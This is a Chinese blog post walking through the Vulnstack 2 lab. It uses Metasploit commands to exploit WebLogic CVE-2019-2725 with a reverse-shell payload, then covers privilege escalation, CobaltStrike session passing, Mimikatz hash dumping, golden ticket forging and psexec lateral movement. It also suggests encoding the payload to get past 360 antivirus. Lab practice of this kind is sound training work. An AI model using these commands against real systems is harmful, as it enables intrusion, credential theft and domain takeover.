【内网渗透】vulnstack第二个靶场

最新推荐文章于 2024-05-03 14:06:03 发布
最新推荐文章于 2024-05-03 14:06:03 发布
阅读量456 收藏 1
点赞数
文章标签: 安全 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58236911/article/details/130438965
版权

         本文为个人在练习红日安全vulnstack系列的第二个靶场时所写笔记,希望对大家能有所帮助,若有疑问,欢迎提出交流,敬请各位批评指正! 

靶场地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/

目录

1.靶场部署

 1.1.网络环境

 1.2.主机配置 

 1.3.开启web服务器

2.外网打点 

 2.1.nmap扫描WEB服务器

 2.2.WebLogic漏洞利用 

3.内网渗透

 3.1.权限提升 

 3.2. 转发会话到CobaltStrike

 3.3 .权限维持

 3.4. 扫描内网

 3.5. 横向移动

1.靶场部署

 1.1.网络环境

模拟外网网段:192.168.111.0/24

模拟内网网段:10.10.10.0/24

VMware配置如下:

 1.2.主机配置 

WEB(外网服务器)

IP1:192.168.111.80(VMnet4)

IP2:10.10.10.80(VMnet3)

PC(内网主机)

IP1:192.168.111.201(VMnet4)

IP2:10.10.10.201(VMnet3)

DC(域控制器)

IP:10.10.10.10(VMnet3)

攻击机器:

Kali:192.168.111.11

Windows10:192.168.111.129

 1.3.开启web服务器

进入C:\Oracle\Middleware\user_projects\domains\base_domain目录,

右击startWebLogic,以管理员身份运行

用户名:Administrator

密码:1qaz@WSX

2.外网打点 

 2.1.nmap扫描WEB服务器

nmap 192.168.111.80 -sV -T4 -Pn

 2.2.WebLogic漏洞利用 

服务器的7001端口上运行有WebLogic服务

使用WebLogic漏洞扫描

目标存在CVE-2019-2725漏洞

回到msf

search CVE-2019-2725

use exploit/multi/misc/weblogic_deserialize_asyncresponseservice

set target Windows

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.111.11

set rhost 192.168.111.80

run

运行时会被360拦截,可以对payload编码或者关闭360

3.内网渗透

 3.1.权限提升 

找到系统进程lsass.exe的pid

迁移到system进程中

migrate 516

此时再执行getuid命令可以看到已经拥有system权限 

也可以使用 CobaltStrike自带的提权插件,提权手段很多这里不举例

 3.2. 转发会话到CobaltStrike

创建CS监听

回到msf

background

use exploit/windows/local/payload_inject

set payload windows/meterpreter/reverse_http

set lhost 192.168.111.129     CS服务端的IP

set lport 8000

set DisablePayloadHandler True

set PrependMigrate True

set session 1   #会话ID为1

run

运行成功后CS收到msf的会话

修改心跳时间为0

 3.3 .权限维持

权限维持有多种途径,这里采用的是黄金票据 

右击会话,Access—Run Mimikatz

记录域名DE1AY.com的SID值

执行hashdump命令 ,记录下hash值

 

 制作黄金票据

 

制作完成时如下所示

 3.4. 扫描内网

使用CS自带的port scan

扫描到的主机会自动进入target视图 

 3.5. 横向移动

创建smb监听

进入target视图(圆圈十字图标show targets in table view)

右击会话—jump—psexec64(PC为32位,需要使用psexec)

点击launch后稍等片刻,对应的主机成功上线

参考连接:

 https://www.cnblogs.com/1008612mrzou/p/16879790.html

https://www.cnblogs.com/bonelee/p/15522887.html

[网络安全/域渗透]内网安全入门靶场 vulnstack2攻略 zerologon一键秒域控_哔哩哔哩_bilibili

m0_58236911
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Vulnstack----1、ATT&CK红队评估实战靶场
七天
08-01 1249
3、敏感目录:http://192.168.144.132/phpMyadmin。4、发现yxcms:http://192.168.144.132/yxcms。192.168.52.143:存在MS17-010。192.168.52.138:存在MS17-010。域用户:dev1、root-tvi862ubeh。win7内网ip:192.168.52.143。1、ip地址:192.168.144.132。内网ip地址:192.168.52.143。内网网段:192.168.52.0/24。
内网渗透靶场 Vulnstack(二)
qq_47168481的博客
03-08 5749
这次靶场东拼西凑也算是通关了,重新复习了一下,也学到了很多东西,在这简单梳理一下思路 内网环境介绍 域控服务器: •内网IP:10.10.10.10 •系统:Windows Server 2012(64位) •用户名:de1ay WEB服务器: •模拟外网IP:192.168.178.153 •内网IP:10.10.10.80 •系统:Windows Server 2008(64位) PC域内主机: •内网IP:10.10.10.201 •系统:Windows 7(32位) 攻击者VPS: •模拟外网IP
2024年网安最全Vulnstack红日安全内网域渗透靶场1实战_vulnstack靶场
最新发布
2401_84252281的博客
05-03 1247
是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及域管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场的渗透过程。
【渗透测试】vulnstack2-渗透思路养成!
m0_74272345的博客
10-01 280
花了一个下午到晚上十点的时间,尽量不借助WP试着打了一次(但还是略看了一点),目的是想形成自己的方法论和渗透思路。但很明显思路还不成熟,不够熟练。这是第二次打vulnstack2,上次还是6月份的时候,这次选择了纯MSF打法,仍然暴露出MSF的一些局限性,还是要配合CS来打本次未完成的两个问题横向移动到PC黄金票据生成(上次纯CS打法是解决了这个问题的)
VulnStack实战(一)超级实战
weixin_51198941的博客
07-14 834
查看了一下,把敏感信息收集起来,比如网站根目录,开启的什么敏感文件,然后我们往下边翻的时候,发现有一个登录框,用常见的弱口令试了一下,发现root,root能登录。当前域名为god,登录用户是administrator,且存在两个网卡,分别是192.168.22.133(外网)和192.168.52.143(内网)net config Workstation 当前计算机名,全名,用户名,系统版本,工作站域,登陆域。共有三台机器,Win7是对外的web机,Win2003和Win2008(DC)是内网机器。
Vulnstack红日安全内网域渗透靶场1实战
热门推荐
道阻且长,行则将至。
07-14 1万+
文章目录前言靶场搭建外网打点MySQL写日志GetshellCMS后台上传GetShell内网渗透靶机CS后门上线内网域信息的收集 前言 VulnStack 是由红日安全团队倾力打造一个靶场知识平台。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场的渗透过程。 靶场搭建 在线 靶场链接 如下: 1、下载后为 3 个虚拟机,网络拓扑如下: 2、从网络拓扑图得知,需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,故需要配置两个网络适配器(网卡),点击
内网渗透技术总结大全.pdf
12-22
内网渗透技术总结大全.pdf
内网渗透之域渗透.pdf
08-07
目录 工作组&域 域的渗透姿势 MS14-068 致谢
内网渗透流程与思路和工具讲解
04-10
内网渗透测试是一个复杂的过程,需要了解目标网络的结构、系统配置、软件版本、开放端口等信息。以下是内网渗透测试的流程和思路: 1. 内网信息收集 在内网渗透测试中,信息收集是非常重要的一步。我们可以使用...
内网渗透攻击线路图.pdf
03-21
内网渗透攻击线路图.pdf
agent内网渗透代理相关
04-14
内网渗透代理
复现红日安全-ATT& CK实战:Vulnstack靶场实战(一)
weixin_51152373的博客
06-14 1012
内网实战环境配置所有主机密码为:hongrisec@2019密码同一修改为:hongrisec@2021攻击机名称: win 10 | kali 2020vm1名称: win 7ip: 外网:192.168.154.0内网:192.168.52.143vm2名称: win 2003vm3名称: win 2008(域控)网络配置Win7服务开启。
内网渗透Vulnstack4靶场的全方位打法
xf555er的博客
12-29 1545
MS14-068是一个著名的Windows Kerberos安全漏洞,允许攻击者篡改Kerberos票据,从而获取非法提权。这个漏洞特别影响Windows域控制器,能让攻击者伪造Kerberos票据,获取域内几乎任意账户的权限,包括域管理员权限。这使得攻击者可以在网络中随意访问和控制资源。
红日靶机vulnstack02【精华总结】
qq_45300786的博客
07-25 1349
前记 听说红日靶机是非常好的内网渗透练习靶机,那么今天就来玩玩。 我会把我学到的全都记录下来,方便以后复习,所以可能有点多,需要的自己看目录。 这里我会先说明思路(环境思路和战斗思路)和总结 红日靶机vulnstack02主机配置比红日靶机vulnstack01【精华总结】多了2点,2台域成员主机的UAC认证和域控的密码复杂度。这2个记得都改了,不然很烦。 这里非常重要的一点,楼主必须先科普一下! 1、域控机可管理所有域用户。 2、域用户、域管理员可登陆到任何一台在域中的域成员主机,当然域成员想要登陆域控机
vulnstack(红日)内网渗透靶场二: 免杀360拿下域控
xf555er的博客
05-30 2345
当针对内网主机使用MSF进行永恒之蓝漏洞攻击失败时,一个替代方案是首先利用frp实现内网穿透,然后再进行漏洞利用。这种方法可能会产生意想不到的效果。我原本计划通过Meterpreter的portfwd命令将域控的3389端口映射到kali本地端口,随后使用rdesktop进行远程登录。然而,这一计划并未成功,我推测这可能是因为域控做了某些限制,只允许10.10.10.0/24网段的主机进行远程登录。
攻防靶场Vulnstack2靶场之CS实战
weixin_42282189的博客
11-19 4149
作者: 不染 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 简介 最近学点攻防,拿靶场练练手,大佬轻喷哈。 靶场简介: 红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。 Bypass UAC Wind.
Vulnstack靶场实战(一)
weixin_46066840的博客
09-13 1514
红日安全实战:Vulnstack靶场实战(一)
记一次Vulnstack靶场内网渗透(五)
小王的储物间
07-25 460
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
vulstack2(hydra爆mssql、免杀360、cs、msf渗透、weblogic、computer brower服务支持6118,域管密码过期kerberos认证错误导致部分域服务不可用)
qq_45290991的博客
09-24 1724
很久之前打了第一个靶场,但是打的不全,不舒坦,不够彻底,由于一直报rpc连接失败所以有的步骤不顺,这次学了一点小小的免杀技巧,过来带着练习的心态学学这个靶场。 0、环境搭建(难点) 环境搭建参考:漏洞详情 【红日安全-VulnStack】ATT&CK实战系列——红队实战(二) - yokan - 博客园 红日靶场二 WalkThrough – Crispr –热爱技术和生活 记得要在web机子里面手动开启服务,在 C:\Oracle\Middleware\user_projects\doma
内网渗透实战:信息收集与常用工具解析
内网渗透测试是一个复杂而细致的过程,涉及到技术和策略的结合。掌握正确的工具和方法,同时理解和尊重组织的安全政策,是每个安全专业人员必备的技能。在实施此类活动时,必须确保遵守法律法规,并采取适当的安全...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值